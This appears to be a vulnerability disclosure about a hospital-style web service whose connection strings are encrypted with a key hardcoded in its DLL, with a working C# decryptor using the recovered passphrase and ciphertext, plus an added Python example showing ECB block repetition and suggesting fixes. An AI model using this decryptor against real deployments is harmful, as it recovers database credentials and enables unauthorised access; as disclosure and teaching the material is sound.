http://www.wooyun.org/bugs/wooyun-2010-0161432

The database connection string on this server is encrypted:

```xml
<add key="conmdecrypt" value="1O1/1Vq/h/2VTErYbMgFMngt9nZIhyMMpviYtT9StTawjkpKnv9fDGqf30pMxEk6H4Vu0Vj+GTY=" />
```

So I downloaded their WebService_yygh.dll, decompiled it, and found this:
 ![poc](1.png)

Tracing getini(), I found this:
 ![poc](2.png)
Tracing further into the md5Decrypt function, I found this:

Then, in `E:\kingstar\ConnConfig\ConnConfig.ini`, I found this:

```
1O1/1Vq/h/0WlMwfuwM+jHw/Fh5rhQQoEr5tZ+tk1OTX7q171c6N6XA0ptSPMUyQ3ywr2i4EJag=
```

Then I wrote my own decryption program:
```csharp
using System;
using System.Security.Cryptography;
using System.Text;
using System.IO;

public class Test
{
    public static void Main()
    {
        string text = null;

        // String that is hashed with MD5 to form the 3DES key
        byte[] buffer = Encoding.Default.GetBytes("winning");

        // Ciphertext found in ConnConfig.ini
        byte[] array = Convert.FromBase64String("1O1/1Vq/h/0WlMwfuwM+jHw/Fh5rhQQoEr5tZ+tk1OTX7q171c6N6XA0ptSPMUyQ3ywr2i4EJag=");

        // The 16-byte MD5 digest is used directly as the TripleDES key
        MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();
        byte[] key = mD5CryptoServiceProvider.ComputeHash(buffer);

        // ECB mode: no IV, every 8-byte block is decrypted independently
        TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
        tripleDESCryptoServiceProvider.Key = key;
        tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;

        text = Encoding.ASCII.GetString(tripleDESCryptoServiceProvider.CreateDecryptor().TransformFinalBlock(array, 0, array.Length));
        Console.WriteLine(text);
    }
}
```
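The following is an added example, not part of the original report: it shows, without any key, why this scheme is weak even before the DLL is decompiled. Because the same static key is used in ECB mode, the two ciphertexts quoted above can be compared block by block, and identical blocks reveal identical plaintext. The function names are this example's own.

```python
import base64
import hashlib

BLOCK = 8  # DES/3DES block size in bytes

# The two ciphertexts quoted in the report (web.config and ConnConfig.ini).
WEB_CONFIG = "1O1/1Vq/h/2VTErYbMgFMngt9nZIhyMMpviYtT9StTawjkpKnv9fDGqf30pMxEk6H4Vu0Vj+GTY="
CONN_INI = "1O1/1Vq/h/0WlMwfuwM+jHw/Fh5rhQQoEr5tZ+tk1OTX7q171c6N6XA0ptSPMUyQ3ywr2i4EJag="


def blocks(b64_text):
    """Decode base64 and split into cipher blocks; reject partial blocks."""
    raw = base64.b64decode(b64_text, validate=True)
    if len(raw) % BLOCK:
        raise ValueError("length is not a multiple of the block size")
    return [raw[i:i + BLOCK] for i in range(0, len(raw), BLOCK)]


def shared_block_positions(a, b):
    """Positions where both ciphertexts hold the same block.

    Under ECB with one key, equal ciphertext blocks mean equal plaintext blocks.
    """
    return [i for i, (x, y) in enumerate(zip(blocks(a), blocks(b))) if x == y]


def key_length_from_passphrase(passphrase):
    """MD5 yields 16 bytes, which .NET's TripleDES treats as a two-key 3DES key."""
    return len(hashlib.md5(passphrase).digest())


if __name__ == "__main__":
    print("blocks per ciphertext:", len(blocks(WEB_CONFIG)), len(blocks(CONN_INI)))
    print("identical block positions:", shared_block_positions(WEB_CONFIG, CONN_INI))
    print("derived key bytes:", key_length_from_passphrase(b"winning"))
```

The first block of both values is identical, so both connection strings begin with the same eight plaintext bytes and were encrypted under the same key; a per-value random IV with an authenticated mode, and a key that is not compiled into the DLL, would remove both properties.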
